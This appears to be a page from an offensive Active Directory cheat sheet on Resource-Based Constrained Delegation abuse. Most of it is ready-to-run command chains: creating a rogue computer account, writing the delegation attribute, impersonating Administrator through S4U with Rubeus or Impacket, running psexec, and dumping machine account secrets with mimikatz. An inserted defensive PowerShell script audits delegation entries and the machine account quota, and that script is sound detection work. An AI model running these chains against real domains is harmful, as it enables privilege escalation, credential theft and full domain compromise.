Resource-Based Constrained Delegation (RBCD)

Unlike classic constrained delegation (configured by a domain admin on the delegating account), RBCD is configured on the resource itself: the attribute msDS-AllowedToActOnBehalfOfOtherIdentity of the target object lists which principals are allowed to delegate to it. If we can write that attribute on a target computer, we can nominate an attacker-controlled account, then chain S4U2Self into S4U2Proxy to obtain a service ticket as any user (typically Administrator) for any service of that target.

See the diagram on Delegations overview for the trust direction.

Requirements:

  • Write access to msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object (WriteAccountRestrictions, GenericAll, GenericWrite or full control via owner/WriteDACL).
  • An account we control that has an SPN. A computer account always has one; MachineAccountQuota (default 10) lets any authenticated domain user create computer accounts.
  • DC on Server 2012 R2 or newer (RBCD is processed by the KDC since that version).
  • The user we want to impersonate must not have "Account is sensitive and cannot be delegated" set and must not be a member of Protected Users.

Attack chain (Windows / Rubeus + RSAT)

The Active Directory PowerShell module exposes Set-ADComputer -PrincipalsAllowedToDelegateToAccount which writes msDS-AllowedToActOnBehalfOfOtherIdentity correctly for us.

```powershell
# 1. Create a controlled computer account (Powermad - no admin, no RSAT)
New-MachineAccount -MachineAccount ATTACKER -Password (ConvertTo-SecureString 'Password123!' -AsPlainText -Force)

# 2. Set RBCD on the target (RSAT AD module on the attacker host)
Set-ADComputer TARGET -PrincipalsAllowedToDelegateToAccount 'ATTACKER$'

# Verify
Get-ADComputer TARGET -Properties PrincipalsAllowedToDelegateToAccount

# 3. Get the attacker computer's AES256 key, then S4U as Administrator and inject the resulting TGS
Rubeus.exe hash /password:Password123! /user:ATTACKER /domain:lab.local
Rubeus.exe s4u /user:ATTACKER$ /aes256:<hash> /impersonateuser:Administrator /msdsspn:cifs/target.lab.local /ptt
```

The same primitive works for any SPN the target exposes (http/, host/, ldap/, mssqlsvc/, ...).

Attack chain (Linux / Impacket)

```sh
# 1. Create a controlled computer account (default MachineAccountQuota = 10)
impacket-addcomputer -computer-name 'ATTACKER$' -computer-pass 'Password123!' \
    -dc-host dc01.lab.local 'lab.local/lowpriv:Summer2025!'

# 2. Write our SID into msDS-AllowedToActOnBehalfOfOtherIdentity on the target
impacket-rbcd -delegate-to 'TARGET$' -delegate-from 'ATTACKER$' -action write \
    'lab.local/lowpriv:Summer2025!'

# 3. Request a service ticket as Administrator for a service of the target
impacket-getST -spn 'cifs/target.lab.local' -impersonate Administrator \
    'lab.local/ATTACKER$:Password123!'

# 4. Use the ticket
export KRB5CCNAME=Administrator@cifs_target.lab.local@LAB.LOCAL.ccache
impacket-psexec -k -no-pass target.lab.local
```
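The defender-side counterpart of the chains above, added here as an example and not part of the original page: it lists every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated, decodes which principals may delegate to it, and flags delegators that look like the primitive used above (a computer created through MachineAccountQuota, which the DC marks by populating mS-DS-CreatorSID with the creator's SID, or one created in the last few days), together with the domain's current quota. It assumes the RSAT ActiveDirectory module on the auditing host.

```powershell
# Added audit script: who may delegate (S4U2Proxy) to each computer, and do they look rogue?
# Assumes the RSAT ActiveDirectory module; mS-DS-CreatorSID is set by the DC on quota-created computers.
Import-Module ActiveDirectory

# MachineAccountQuota = 0 removes the "any user can add a computer" step of the attack chain.
$domain = Get-ADDomain
$quota  = (Get-ADObject $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
Write-Host "ms-DS-MachineAccountQuota for $($domain.DNSRoot) = $quota (0 is the hardened value)"

$Days   = 7                              # "recently created" threshold, tune per environment
$cutoff = (Get-Date).AddDays(-$Days)

Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity' |
ForEach-Object {
    $target = $_
    # The attribute is a security descriptor; each ACE trustee is a principal allowed to delegate to this host.
    $sd = $target.'msDS-AllowedToActOnBehalfOfOtherIdentity'
    if ($sd -is [byte[]]) {              # raw form: decode it (the AD module usually returns it decoded)
        $raw = $sd
        $sd  = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $sd.SetSecurityDescriptorBinaryForm($raw)
    }
    foreach ($ace in $sd.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        $sid = $ace.IdentityReference.Value
        # Resolve the trustee; a SID that no longer resolves (deleted rogue computer) is itself suspicious.
        $delegator = Get-ADObject -LDAPFilter "(objectSid=$sid)" `
            -Properties sAMAccountName, whenCreated, 'mS-DS-CreatorSID'
        $creator = $null
        if ($delegator -and $delegator.'mS-DS-CreatorSID') {
            $bytes   = $delegator.'mS-DS-CreatorSID'
            $creator = if ($bytes -is [byte[]]) { (New-Object System.Security.Principal.SecurityIdentifier($bytes, 0)).Value } else { "$bytes" }
        }
        $flags = @()
        if (-not $delegator)                    { $flags += 'UNRESOLVED-SID' }
        if ($creator)                           { $flags += 'QUOTA-CREATED' }
        if ($delegator.whenCreated -gt $cutoff) { $flags += "CREATED<${Days}d" }
        [pscustomobject]@{
            Target       = $target.Name
            Delegator    = if ($delegator) { $delegator.sAMAccountName } else { $sid }
            DelegatorSID = $sid
            CreatorSID   = $creator
            WhenCreated  = $delegator.whenCreated
            Flags        = ($flags -join ',')
        }
    }
} | Sort-Object Flags -Descending | Format-Table -AutoSize
```

Any row whose Delegator is a computer account with a CreatorSID is exactly the ATTACKER$ pattern from the chains above; the CreatorSID tells you which low-privileged user created it.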

Without creating a new computer account

When MachineAccountQuota = 0 (or creating a rogue computer is undesirable for opsec), we can reuse the machine account of a host we already control as the SPN-bearing principal.

Prerequisites:

  • Local admin / SYSTEM on a domain-joined host (call it HOSTA).
  • Write access to msDS-AllowedToActOnBehalfOfOtherIdentity on the target object (HOSTB) is still required.

```powershell
# 1. As SYSTEM, read the machine account password from LSA secrets
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::secrets
# -> look for $MACHINE.ACC; the password is a raw hex blob
```

Convert the hex machine password (the UTF-16LE bytes of the machine account's password) to a Kerberos AES256 key using the script in Tool cheat sheet: Convert HEX computer machine password to AES key for Rubeus. The salt is <DOMAIN.UPPER>host<hostname.lower>.<domain.lower> (e.g. LAB.LOCALhosthosta.lab.local).

```powershell
# 2. Write HOSTA's computer account into HOSTB's RBCD attribute
Set-ADComputer HOSTB -PrincipalsAllowedToDelegateToAccount 'HOSTA$'

# 3. S4U as Administrator using HOSTA's derived AES256 key
Rubeus.exe s4u /user:HOSTA$ /aes256:<aes256-from-script> /impersonateuser:Administrator /msdsspn:cifs/hostb.lab.local /ptt
```

Mimikatz also produces the raw RC4 / NTLM of the machine account, which Rubeus accepts via /rc4:.

Local privilege escalation variant

If you are looking for an LPE abusing RBCD, see LPE via Kerberos relaying.